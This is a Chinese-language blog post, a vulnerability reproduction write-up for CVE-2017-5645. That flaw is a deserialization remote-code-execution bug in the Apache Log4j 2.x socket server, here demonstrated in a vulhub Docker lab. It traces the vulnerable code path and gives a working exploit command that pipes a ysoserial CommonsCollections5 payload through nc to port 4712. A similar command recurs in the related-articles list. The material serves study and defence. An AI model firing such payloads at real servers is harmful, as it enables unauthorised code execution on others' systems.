Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

最新推荐文章于 2023-10-15 11:55:33 发布
最新推荐文章于 2023-10-15 11:55:33 发布
阅读量715 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44047654/article/details/128289367
版权

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

0x01 漏洞简介

Apache Log4j 是一个用于 Java 的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2 之前的 2.x 版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

0x02 影响版本

Apache Log4j 2.8.2之前的2.x版本 Log4j2.x<=2.8.1

0x03 环境搭建

下载环境:https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645

运行环境:docker-compose up -d

查看容器:docker ps -a

0x04 漏洞分析

漏洞分析

Description: When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.

描述:当使用TCP套接字服务器或UDP套接字服务从另一个应用程序接收序列化日志事件,这是一个精心设计的可以发送二进制有效载荷,当反序列化时,可以执行任意命令

UdpSocketServer与TcpSocketServer的结构类似

我们创建TcpSocketServer代码用于测试。

// src/main/java/Log4jSocketServer.java
import org.apache.logging.log4j.core.net.server.ObjectInputStreamLogEventBridge;
import org.apache.logging.log4j.core.net.server.TcpSocketServer;

import java.io.IOException;
import java.io.ObjectInputStream;

public class Log4jSocketServer {
    public static void main(String[] args){
        TcpSocketServer<ObjectInputStream> myServer = null;
        try{
            myServer = new TcpSocketServer<ObjectInputStream>(4712, new ObjectInputStreamLogEventBridge());
        } catch(IOException e){
            e.printStackTrace();
        }
        myServer.run();
    }
}

<!-- maven文件pom.xml -->
<dependencies>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.8.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.8.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/commons-collections/commons-collections -->
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.1</version>
        </dependency>
    </dependencies>

当我们运行代码后,程序会在本地的 4712 端口开始等待接收数据,然后在下图第105行代码处,将接收到的数据转换成 ObjectInputStream 对象数据,最终在 handler.start() 中调用 SocketHandler 类的 run 方法。
在这里插入图片描述

serverSocket就是根据之前传入的int端口号来新建的一个ServerSocket对象。注意红框里,将clientSocket作为参数实例化SocketHandler类,然后放入handlers中,handlers是一个ConcurrentMap。最后调用了start函数

我们去看看这个 SocketHandler 具体做了什么
在这里插入图片描述

函数里,获取了 socket 中的数据流后,传入了 logEventInputwrapStream中,看看logEventInput
在这里插入图片描述

就将传入的inputStream用ObjectInputStream包装一下然后返回了
那么这个SocketHandler中的inputStream就是一个ObjectInputStream对象了

在这里插入图片描述

我们接着看SocketHandler的run函数,在 SocketHandler 类的 run 方法中, ObjectInputStream 对象数据被传入了 ObjectInputStreamLogEventBridge 类的 logEvents 方法,而反序列化就发生在这个方法中。

在这里插入图片描述

在这里插入图片描述

0x05 漏洞复现

ysoserial下载地址:https://github.com/frohoff/ysoserial 可以下载打包好的jar文件,也可以下载源文件自己编译mvn clean package -DskipTests

执行命令java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.237.129 4712

在这里插入图片描述

成功在靶机中生成了文件,命令执行成功

`

在这里插入图片描述

吉吉_大王
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现系列:Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
weixin_54626591的博客
05-16 55
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645
weixin_50341025的博客
04-23 2609
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 漏洞环境 执行如下命令启动漏洞环境 docker-compose up -d 环境启动后,将在4712端口开启一个TCPServer。 说一下,除了使用vulhub的docker镜像搭建环境外,我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer:java -cp "log4j-api-2.8.1.j
Vulhub的log4jCVE-2017-5645
qq_62028283的博客
10-02 190
kali的JDK安装切换,Ubuntu换源,log4j复现。
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
m0_52701599的博客
04-06 2781
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
CVE-2017-5645Apache Log4j Server 反序列化命令执行漏洞
weixin_45742777的博客
07-19 5240
CVE-2017-5645Apache Log4j Server 反序列化命令执行漏洞
Apache-Log4j-Server-反序列化CVE-2017-5645
bqnagus
09-29 422
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
log4j日志漏洞问题
feinifi的博客
11-16 3988
log4j远程漏洞复现以及对这个漏洞问题的看法。
Apache Log4j Server (CVE-2017-5645) 反序列化命令执行漏洞
最新发布
来日可期的博客
10-15 2025
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)复现
锋刃科技的博客
01-28 4973
漏洞概述 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 环境搭建 这里使用vulhub来搭建环境 https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 进入目录并启动环境 cd vulhub-master/log4j/CVE-2017-5645/ docker-...
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
严重危害警告 Log4j 执行漏洞被公开
qq_53058639的博客
02-14 1095
12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。Log4j 是目前全球使用最广泛的 java 日志框架之一。
Apache log4j漏洞总结
星落的博客
08-02 3229
Apache log4j漏洞总结包括CVE-2017-5645(Log4j反序列化漏洞)和CVE-2021-44228(Log4j 2远程代码执行漏洞)
最详细的Log4j使用教程
Code_LT的博客
07-08 3571
其实您也可以完全不使用配置文件,而是在代码中配置Log4j环境。但是,使用配置文件将使您的应用程序更加灵活。Log4j支持两种配置文件格式,一种是XML格式的文件,一种是Java特性文件(键=值)。下面我们介绍使用Java特性文件做为配置文件的方法:其中,level 是日志记录的优先级,分为OFF、FATAL、ERROR、WARN、INFO、DEBUG、ALL或者您定义的级别。Log4j建议只使用四个级别,优 先级从高到低分别是ERROR、WARN、INFO、DEBUG。
Web网络安全-----Log4j高危漏洞原理及修复
热门推荐
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
log4j2 2.14.0之前的版本出现重大漏洞
Syjavascript的博客
12-11 1720
震惊 log4j2 2.14.0之前的版本出现重大漏洞 长话短说 lookup 这个是log4j2的一个功能,就是说你可以用 String javaCmd = "${java:os}"; LOGGER.info("javacmd: {}", javaCmd); 这种方式来打印系统的一些相关信息 而这种lookup好像是基于jndi,rmi,具体这两个东西是啥,请去google一下, 这里就不多说了。 jndi注入 这个也是一种大课题了,我前几天才知道有这个东西 直接上代码 环境介绍(最基本的maven
Log4j-CVE-2017-5645
10-05
Log4j-CVE-2017-5645是指Apache Log4j 2.x版本中存在的安全漏洞。攻击者可以利用该漏洞执行任意代码。为了利用该漏洞,攻击者可以使用ysoserial生成payload,并发送到受影响的Log4j服务器。具体操作可以使用以下命令: java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc 192.168.1.240 4712 这个命令将创建一个名为CVE-2017-5645_is_success的文件,并发送到IP地址为192.168.1.240,端口号为4712的Log4j服务器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值